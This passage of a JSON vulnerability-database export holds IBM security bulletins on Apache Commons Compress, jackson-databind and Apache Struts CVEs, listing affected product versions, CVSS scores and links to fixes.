_[CVE-2018-11771](<https://vulners.com/cve/CVE-2018-11771>)_ \n**DESCRIPTION:** Apache Commons Compress is vulnerable to a denial of service, caused by the failure to return the correct EOF indication after the end of the stream has been reached by the ZipArchiveInputStream method. By reading a specially crafted ZIP archive, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base Score: 3.1 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/148429>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: version 11.7.1.0 \nIBM InfoSphere Information Server on Cloud: version 11.7\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_ | _APAR_ | _Remediation/First Fix_ \n---|---|---|--- \nInfoSphere Information Server, Information Server on Cloud | 11.7.1 | [_JR61522_](<http://www.ibm.com/support/docview.wss?uid=swg1JR61522>) | \\--Apply IBM InfoSphere Information Server [_Connectivity Security patch_](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FIBM+InfoSphere+Information+Server&fixids=is11710_JR61522_scapibridge_engine_*>) \n \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-12-06T19:32:18", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Commons Compress affects IBM InfoSphere Information Server connectivity componets", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2019-12-06T19:32:18", "id": "373505685C2504F2E87D285F28BBBB2E73FE52DDBDB53C323BFA4E4CED76480B", "href": "https://www.ibm.com/support/pages/node/1086039", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:47:01", "description": "## Summary\n\nThere is a vulnerability in Apache Commons Compress used by IBM\u00ae Cloud App Management V2018. IBM\u00ae Cloud App Management has addressed the applicable CVE in a later version.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11771](<https://vulners.com/cve/CVE-2018-11771>) \n**DESCRIPTION:** Apache Commons Compress is vulnerable to a denial of service, caused by the failure to return the correct EOF indication after the end of the stream has been reached by the ZipArchiveInputStream method. By reading a specially crafted ZIP archive, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base Score: 3.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148429> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Cloud App Management V2018.2.0 \nIBM Cloud App Management V2018.4.0 \nIBM Cloud App Management V2018.4.1\n\n## Remediation/Fixes\n\nIBM Cloud App Management V2018 was updated to use a later version of Apache Commons. Install IBM Cloud App Management V2019.2.0 to address these security vulnerabilities. IBM Cloud App Management V2019.2.0 is available on [IBM Passport Advantage](<https://www.ibm.com/software/passportadvantage/index.html>).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-05-03T15:45:01", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Commons Compress may affect IBM Cloud App Management V2018", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2019-05-03T15:45:01", "id": "2EE903E19A7CD16A29F5CE603A6BE1444D228989B00F0695E0424CEFF2903C06", "href": "https://www.ibm.com/support/pages/node/883280", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:46:05", "description": "## Summary\n\nVulnerability affects IBM Cloud Object Storage SDK Java. It has been addressed in the latest SDK Java release.\n\n## Vulnerability Details\n\nCVE-ID: CVE-2019-12086 \nDescription: FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a Polymorphic Typing issue that occurs due to missing com.mysql.cj.jdbc.admin.MiniAdmin validation. By sending a specially-crafted JSON message, a remote attacker could exploit this vulnerability to read arbitrary local files on the server. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/161256> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nCVE-ID | Affected SDK Releases \n---|--- \nCVE-2019-12086 | IBM COS SDK Java releases prior to 2.5.0 \n \n## Remediation/Fixes\n\n**_IBM COS SDK Releases_** | **_Link to Fix / Fix Availability Target_** \n---|--- \n[SDK Java 2.5.0](<https://github.com/IBM/ibm-cos-sdk-java/tree/2.4.2>) | \n\nhttps://github.com/IBM/ibm-cos-sdk-java/tree/2.5.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-06-12T23:40:01", "type": "ibm", "title": "Security Bulletin: Vulnerability affects IBM Cloud Object Storage SDK Java (June 2019)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2019-06-12T23:40:01", "id": "620DEEE8E25F410CD7D5D914617F8424D18C6FBA60049459E6DDEF27E51FE74C", "href": "https://www.ibm.com/support/pages/node/887529", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-23T21:45:29", "description": "## Summary\n\nIBM Event Streams has addressed the following vulnerability\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-12086](<https://vulners.com/cve/CVE-2019-12086>) \n**DESCRIPTION: ** FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a Polymorphic Typing issue that occurs due to missing com.mysql.cj.jdbc.admin.MiniAdmin validation. By sending a specially-crafted JSON message, a remote attacker could exploit this vulnerability to read arbitrary local files on the server. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/161256> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM Event Streams 2018.3.0\n\nIBM Event Streams 2018.3.1\n\nIBM Event Streams 2019.1.1\n\n## Remediation/Fixes\n\nUpgrade to IBM Event Streams 2019.2.1 which is available from [Passport Advantage](<https://www.ibm.com/software/passportadvantage/>).\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-07-09T14:30:02", "type": "ibm", "title": "Security Bulletin: IBM Event Streams is affected by jackson-databind vulnerability CVE-2019-12086", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2019-07-09T14:30:02", "id": "D78944C84B5DC781DE9FF60E3429142DE64F0F3040B571360FB07D29CCB7FF6D", "href": "https://www.ibm.com/support/pages/node/888069", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-21T21:44:48", "description": "## Summary\n\nIBM Content Navigator has addressed the following vulnerability.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nAffected IBM Content Navigator | Affected Versions \n---|--- \nIBM Content Navigator | 2.0.3 \nIBM Content Navigator | 3.0CD \n \n## Remediation/Fixes\n\nProduct | VRMF | Remediation / First Fix \n---|---|--- \nIBM Content Navigator | 2.0.3 | Contact customer support center for the fix and instructions. \nIBM Content Navigator | 3.0 Continuous Delivery | Contact customer support center for the fix and instructions. \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {}, "published": "2019-01-04T23:10:01", "type": "ibm", "title": "Security Bulletin: IBM Content Navigator is affected by a vulnerability in Apache Apache Commons BeanUtils (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2019-01-04T23:10:01", "id": "3C85B3C7443FFDE0DF64A3D0D4869686417DA52714135E90BD49D23E0331CD9E", "href": "https://www.ibm.com/support/pages/node/740499", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:49:32", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of ClearQuest. Information about a security vulnerability affecting IBM WebSphere Application Server (WAS) has been published in a security bulletin.\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \nReview security bulletin [_Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114_](<http://www.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details.\n\n## Affected Products and Versions\n\n**Affected Product and Version(s)**\n\n| **Product and version shipped as a component** \n---|--- \n8.0.1.x is _not_ affected| WAS 8.5 media is included as a separate download, and only WAS 8.x is supported. \n8.0.0.x (Affected when using WAS 7.x)| WAS 8 media is included as a separate download, but user may still be on WAS 7.x. \n7.1.2.x| WAS 6.1.0.25 \n7.1.1.x| WAS 6.1.0.25 \n7.1.0.x| WAS 6.1.0.15 \n \n**Note**: WAS V8.x is not affected, but you may have a choice as to the WAS version used with ClearQuest, so be sure to check which version of WAS is actually installed.\n\n## Remediation/Fixes\n\nReview the **Remediation/Fixes** section in security bulletin [_Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114_](<http://www.ibm.com/support/docview.wss?uid=swg21672316>) for a solution. \n\n**Affected Versions**\n\n| \n\n** Applying the fix** \n \n---|--- \n7.1.0.x, 7.1.1.x, and 7.1.2.x| [Document 1390803](<http://www.ibm.com/support/docview.wss?uid=swg21390803>) explains how to update WebSphere Application Server for ClearQuest CM Servers at release 7.1.x. Consult those instructions when applying the fix. \n8.0.0.x, running with WebSphere Application Server 7| Apply the WebSphere Application Server fix directly to your ClearQuest CM Servers host. No ClearQuest-specific steps are necessary. \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-17T04:54:24", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Rational ClearQuest (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T04:54:24", "id": "FE252D131D8F7560832F857A2E94C6660B4590940855E6B811C5BA4036C7A5C4", "href": "https://www.ibm.com/support/pages/node/510433", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-23T21:53:05", "description": "## Summary\n\nIBM Tivoli Monitoring, IBM Tivoli Application Dependency Discovery Manager, Tivoli Common Reporting are shipped as a component of IBM System Director Editions. Information about a security vulnerability affecting has been published in a security bulletin.\n\n## Vulnerability Details\n\n## Abstract\n\nIBM Tivoli Monitoring, IBM Tivoli Application Dependency Discovery Manager, Tivoli Common Reporting are shipped as a component of IBM System Director Editions. Information about a security vulnerability affecting has been published in a security bulletin.\n\n## Content\n\n**Vulnerability Details:**\n\nPlease consult the security bulletin for the affected products as shown below for vulnerability details.\n\n## Affected products and versions\n\nAffected Product and Version(s) | Product and Version shipped as a component | Security Bulletin \n---|---|--- \nIBM System Director Editions 6.2.0.0 | IBM Tivoli Monitoring 6.2.2.02 base FP2 | <http://www.ibm.com/support/docview.wss?uid=swg21680533> \nIBM Tivoli Application Dependency Discovery Manager v7.2 | <http://www.ibm.com/support/docview.wss?uid=swg21674905> \nTivoli Common Reporting 1.3 | <http://www-01.ibm.com/support/docview.wss?uid=swg21674379> \nIBM System Director Editions 6.2.1.0 | IBM Tivoli Monitoring 6.2.2 | <http://www.ibm.com/support/docview.wss?uid=swg21680533> \nIBM Tivoli Application Dependency Discovery Manager v7.2 | <http://www.ibm.com/support/docview.wss?uid=swg21674905> \nTivoli Common Reporting 1.3 | <http://www-01.ibm.com/support/docview.wss?uid=swg21674379> \nIBM System Director Editions 6.3.0.0 | IBM Tivoli Monitoring 6.2.3 | <http://www.ibm.com/support/docview.wss?uid=swg21680533> \nIBM Tivoli Application Dependency Discovery Manager v7.2.1 | <http://www.ibm.com/support/docview.wss?uid=swg21674905> \nTivoli Common Reporting 2.1.1 | <http://www-01.ibm.com/support/docview.wss?uid=swg21674379> \n \n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement** \nNone\n\n**Change History** \n13 August 2014: Original Copy Published \n\n\n## ", "cvss3": {}, "published": "2019-01-31T01:25:01", "type": "ibm", "title": "Security Bulletin: Security vulnerability has been identified in IBM Tivoli Monitoring, IBM Tivoli Application Dependency Discovery Manager, and Tivoli Common Reporting shipped with IBM System Director Editions (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2019-01-31T01:25:01", "id": "BF241965E218490C5786B115CB2639A8CA788DC4170BC648A82E9FCC5A5AEBA4", "href": "https://www.ibm.com/support/pages/node/865188", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T05:49:32", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of RequisitePro. Information about a security vulnerability affecting IBM WebSphere Application Server (WAS) has been published in a security bulletin. \n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \nReview [Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server](<https://www-304.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details. \n\n## Affected Products and Versions\n\nIBM Rational RequisitePro version 7.1.0, 7.1.1, and 7.1.2 ship with an affected version of WebSphere Application Server. \n \n\n\n**RequisitePro Version**| \n\n**WebSphere Version shipped with RequisitePro** \n \n---|--- \n7.1.3.x| IBM WebSphere Application Server V7 (* see note below) \n7.1.2.x| IBM WebSphere Application Server V6.1.0.15 \n7.1.1.x| IBM WebSphere Application Server V6.1.0.15 \n7.1.0.x| IBM WebSphere Application Server V6.1.0.15 \n** \nNote**: IBM Rational RequisitePro version 7.1.3 does not ship with WAS, but you are still required to have installed at least WAS V7, which is vulnerable to the issue. \n\n## Remediation/Fixes\n\nReview the **Remediation/Fixes** section in [Security Bulletin: Classloader Manipulation Vulnerability in IBM WebSphere Application Server](<https://www-304.ibm.com/support/docview.wss?uid=swg21672316>) to locate the proper fix for your version of IBM WebSphere Application Server. Be sure to verify the version of WAS you have installed in case you have upgraded since the initial installation.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-17T04:54:30", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Rational RequisitePro (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T04:54:30", "id": "7911EC80C28F7BE157F66EC6B3E35B2999E41F97F4299CD83723DE004A5C5CC2", "href": "https://www.ibm.com/support/pages/node/511005", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-21T05:52:24", "description": "## Summary\n\nThere is a ClassLoader manipulation vulnerability in Apache Struts that is used by IBM Tivoli Identity Manager (ITIM) / IBM Security Identity Manager (ISIM)\n\n## Vulnerability Details\n\n**CVEID:** \n[_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n \n**DESCRIPTION: **Apache Struts 1.X could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. There is partial impact to confidentiality, integrity, and availability. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nIBM Tivoli Identity Manager (ITIM) - 5.0, 5.1 \nIBM Security Identity Manager (ISIM) - 6.0\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nITIM| 5.0| IV61016| [Interim Fix 60](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?product=ibm/Tivoli/Tivoli+Identity+Manager&release=5.0.0.15&platform=AIX&function=fixId&fixids=5.0.0.15-ISS-TIM-IF0060&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \nITIM| 5.1| IV60023| [Interim Fix 54](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=Security+Systems&product=ibm/Tivoli/Tivoli+Identity+Manager&release=5.1.0.15&platform=All&function=fixId&fixids=5.1.0.15-ISS-TIM-IF0054&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \nISIM| 6.0| IV61082| [Interim Fix 10](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?product=ibm/Tivoli/Tivoli+Identity+Manager&release=6.0.0.2&platform=All&function=fixId&fixids=6.0.0.2-ISS-SIM-IF0010&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-16T21:18:03", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts affecting IBM Tivoli Identity Manager/IBM Security Identity Manager (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-16T21:18:03", "id": "71A0E260D835E4FB784163408D486ADEA9933D2BF29E0D594920C0DE72D440F2", "href": "https://www.ibm.com/support/pages/node/512711", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:46:43", "description": "## Summary\n\nTivoli Integrated Portal is shipped as a component of Tivoli FastBack for Workstations Central Administration Console. Information about a security vulnerability affecting Tivoli Integrated Portal has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [_Security Bulletin: ClassLoader manipulation with Apache Struts affecting Tivoli Integrated Portal (CVE-2014-0114)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21674379>) for vulnerability details.\n\n## Affected Products and Versions\n\n** **\n\nAll versions of Tivoli FastBack for Workstations Central Administration Console are affected by this vulnerability. For customers that have levels 6.1.0.X, please first apply the 6.1.2.0 fix pack (or optionally upgrade to 6.3.x or 7.1.x level or higher) then follow the instructions in the bulletin above to apply the Tivoli Integrated Portal patch \n--- \nPrincipal Product and Version(s)| Affected Supporting Product and Version \n---|--- \nTivoli FastBack for Workstations 6.1.0, Central Administration Console component| Apply the 6.1.2.0 fix pack (or optionally upgrade to 6.3.x or 7.1.x level or higher) then apply the specific Tivoli Integrated Portal patch \nTivoli FastBack for Workstations 6.1.2, Central Administration Console component | Tivoli Integrated Portal 2.1 \nTivoli FastBack for Workstations 6.1.3, Central Administration Console component| Tivoli Integrated Portal 2.1.0.5 \nTivoli FastBack for Workstations 6.3.0, Central Administration Console component | Tivoli Integrated Portal 2.1.0.5 \nTivoli FastBack for Workstations 6.3.1, Central Administration Console component | Tivoli Integrated Portal 2.2.0.9 \nTivoli FastBack for Workstations 7.1.0, Central Administration Console component| Tivoli Integrated Portal 2.2.0.11 \n \n## Remediation/Fixes\n\nPlease consult the security bulletin [_Security Bulletin: ClassLoader manipulation with Apache Struts affecting Tivoli Integrated Portal (CVE-2014-0114)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21674379>) for remediation details.\n\n## ", "cvss3": {}, "published": "2018-06-17T14:42:44", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in Tivoli Integrated Portal shipped with Tivoli FastBack for Workstations Central Administration Console (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T14:42:44", "id": "C3B05CDEF184BFD293F7EDCB8C5A430A32B9D04DDF8336E289D0609D021B85C2", "href": "https://www.ibm.com/support/pages/node/513179", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:40:39", "description": "## Summary\n\nWebSphere Application Server Test Environment (WAS TE) from IBM Rational Application Developer for WebSphere Software is shipped with Rational Business Developer. The WAS TE is affected by a classloader manipulation vulnerability in Apache Struts. Information about the security vulnerability affecting Rational Application Developer has been published in a security bulletin.\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \nReview the security bulletin [ClassLoader manipulation with Apache Struts in WebSphere Application Server affecting Rational Application Developer (CVE-2014-0114)](<http://www-01.ibm.com/support/docview.wss?uid=swg21674339>) for vulnerability details. \n\n## Affected Products and Versions\n\nVersion 9.1.0 and earlier of Rational Business Developer are affected.\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Fix** \n---|---|---|--- \nRational Business Developer| 7.5.x and 8.0.x| [PI18804](<http://www-01.ibm.com/support/docview.wss?uid=swg1PI18804>)| \n\n * For WAS TE versions v6.1.0.0 through to v6.1.0.47, apply [WebSphere Application Server 6.1 Test Environment Update 6.1.0.47u2](<http://www-01.ibm.com/support/docview.wss?uid=swg24037637>)\n * For WAS TE versions v7.0.0.0 through to v7.0.0.31 , apply [WebSphere Application Server 7.0 Test Environment Extension 7.0.0.31u1](<http://www-01.ibm.com/support/docview.wss?uid=swg24037638>) \nRational Business Developer| 8.5.x and 9.x| [PI18804](<http://www-01.ibm.com/support/docview.wss?uid=swg1PI18804>)| \n\n * For WAS TE versions v7.0.0.0 through to v7.0.0.31 , apply [WebSphere Application Server 7.0 Test Environment Extension 7.0.0.31u1](<http://www-01.ibm.com/support/docview.wss?uid=swg24037638>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-08-03T04:23:43", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts in WebSphere Application Server affecting Rational Business Developer (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-08-03T04:23:43", "id": "E77EC6F45B7D6E8BB278E220AB25F28DDD520313254120E5AA95ABE42DD9D030", "href": "https://www.ibm.com/support/pages/node/245897", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 